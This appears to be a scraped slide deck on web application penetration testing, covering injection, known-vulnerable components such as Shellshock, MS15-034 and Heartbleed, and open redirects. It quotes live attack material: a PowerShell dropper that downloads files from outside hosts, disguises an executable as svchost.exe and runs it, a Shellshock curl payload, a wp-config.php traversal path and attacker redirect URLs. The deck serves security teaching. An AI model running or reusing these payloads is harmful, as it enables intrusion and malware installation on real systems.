Upload
others
View
41
Download
4
Embed Size (px)
Citation preview
Operating System
Web ServerDatabase
Framework / CMS
Web Application / Web Service
Plug-in
Attack Surfaces
• SQL injection
• LDAP injection
• XPATH injection
• Command injection
• Code injection
• Ex:
• AJAX
• JSON ***
Low Hanging Fruits
powershell "Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;
(New-Object
System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindo
ws/c5675e0b/dd.exe','dd.exe');
(New-Object System.Net.WebClient).DownloadFile
('http://img1.imagehousing.com/0/art-297435.jpg','favicon.jpg');
(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg
of=svchost.exe skip=2931 bs=1');
Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');"
Low Hanging Fruits
http://www.victim.com?cmd=
Command injection
Malicious File Upload
Low Hanging Fruits
- HTTP PUT
- File upload feature
- Weak CMS admin password
- Platform vulnerability
- RCE
- Authentication bypass
- Log file + LFI
• Temp File, Back Up test trick
– Path + .zip , .rar , .bak
– Ex; /admin –
• http://testsite.com/admin.zip
• http://testsite.com/admin.rar
• http://testsite.com/admin.bak
Low Hanging Fruits
Ref: https://securenetworkmanagement.com/shellshock-simple-user-agent-exploit/
Using Components with Known Vulnerabilities
Shellshock
curl http://cgi-bin/service/index.cgi" --insecure -H "User-Agent: () { :; }; /bin/bash
‘ping 192.168.30.54 –c 10’"
Low Hanging Fruits
• IIS
https://www.youtube.com/watch?v=vw4JFKZ3lS0
MS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635 )
Using Components with Known Vulnerabilities
Low Hanging Fruits
• IIS
https://www.youtube.com/watch?v=vw4JFKZ3lS0
MS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635 )
Using Components with Known Vulnerabilities
Low Hanging Fruits
http://blog.trendmicro.com/trendlabs-security-intelligence/iis-at-risk-an-in-depth-look-into-cve-2015-1635/
• IISMS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635 )
Information leakage
Using Components with Known Vulnerabilities
Low Hanging Fruits
• OpenSSL
Heartbleed (CVE-2014-0160)
• Abuse SSL Heartbeat communication to get
more data in the server memory.
• Email, instant messaging (IM) , VPN and
Web.
• OpenSSL 1.0.1 through 1.0.1f (inclusive) are
vulnerable
http://heartbleed.com/
Using Components with Known Vulnerabilities
Low Hanging Fruits
https://www.baagames.com/2014/04/steam-heartbreed/
Using Components with Known Vulnerabilities
Low Hanging Fruits
Operating System
Database
Framework / CMS
Web Application / Web Service
Plug-in
Web Server Platform
CMS + Database Mgn web
Components
Using Components with Known Vulnerabilities
Low Hanging Fruits
https://www.youtube.com/watch?v=zSva2UPwKvoAnon Joker
Using Components with Known Vulnerabilities
Low Hanging Fruits
http://the.victim.com/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
Connect to Database
Using Components with Known Vulnerabilities
Low Hanging Fruits
https://your.bank.com/?url=http://hacker.site.com
Unvalidated Redirects and Forwards
Low Hanging Fruits
https://your.bank.com/?url=%68%74%74%70%3a%2f%2f%68%
61%63%6b%65%72%2e%73%69%74%65%2e%63%6f%6d
Unvalidated Redirects and Forwards
Low Hanging Fruits
Testing for Client Side URL Redirect (OTG-CLIENT-004)
Unvalidated Redirects and Forwards
Low Hanging Fruits
https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
• Automatic Scan
Low Hanging Fruits
• Some type of insecure direct object references
• Miss Function access control
• Business logic
– Step/Flow
– Stage
– Limit
Vulnerability cannot
discovered by tools
OWASP Testing GuideInfomation Gathering
Configuration and Deployment Management Testing
Identity Management Testing
Authentication Testing
Authorization Testing
Session Management Testing
Input Validation Testing
Test for Error Handling
Test for Weak Cryptography
Business Logic Testing
Client Side Testing